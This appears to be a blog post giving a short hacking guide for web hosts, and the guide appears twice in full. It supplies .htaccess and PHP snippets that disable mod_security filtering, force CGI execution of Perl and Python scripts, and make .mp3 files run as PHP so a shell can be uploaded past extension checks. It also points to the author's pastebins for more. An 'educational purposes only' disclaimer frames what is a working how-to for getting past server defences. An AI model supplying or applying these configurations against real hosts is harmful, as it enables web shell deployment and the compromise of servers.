First thing if you can't use python , perl or cgi script to execute commands after giving to the script CHMOD 0755 the solution is to upload this variable php and edit it with the name of the file that you want to execute
NOTE: This guide is for educational purposes only I do not take any responsibility about anything happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision.
exemple of a file: "perl.pl"
CODE:
<?
chmod("perl.pl" , 0755);
?>
Then save this file as ".php" extension.
If the host is very secured and you can't read directories or upload a file or edit a file just use this ".htaccess"
CODE:
<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine Off
</IfModule>
Remember if perl don't work with the variable php just use this ".htaccess"
CODE:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl
For Python also same but change ".pl" to ".py" for cgi script use this ".htaccess"
CODE:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .root
AddHandler cgi-script .root
AddHandler cgi-script .root
If you want to Bypass Uploads Options and upload shell in another extension use this ".htaccess" :
CODE:
<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>
For more Information check some old pastebin i posted ^_^
http://pastebin.com/NapunGnJ
http://pastebin.com/VJQN4AvF
You can find many if you search in Google Enj0y ;)
Thanks.
NOTE: This guide is for educational purposes only I do not take any responsibility about anything happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision.
exemple of a file: "perl.pl"
CODE:
<?
chmod("perl.pl" , 0755);
?>
Then save this file as ".php" extension.
If the host is very secured and you can't read directories or upload a file or edit a file just use this ".htaccess"
CODE:
<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine Off
</IfModule>
Remember if perl don't work with the variable php just use this ".htaccess"
CODE:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl
For Python also same but change ".pl" to ".py" for cgi script use this ".htaccess"
CODE:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .root
AddHandler cgi-script .root
AddHandler cgi-script .root
If you want to Bypass Uploads Options and upload shell in another extension use this ".htaccess" :
CODE:
<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>
For more Information check some old pastebin i posted ^_^
http://pastebin.com/NapunGnJ
http://pastebin.com/VJQN4AvF
You can find many if you search in Google Enj0y ;)
Thanks.
No comments:
Post a Comment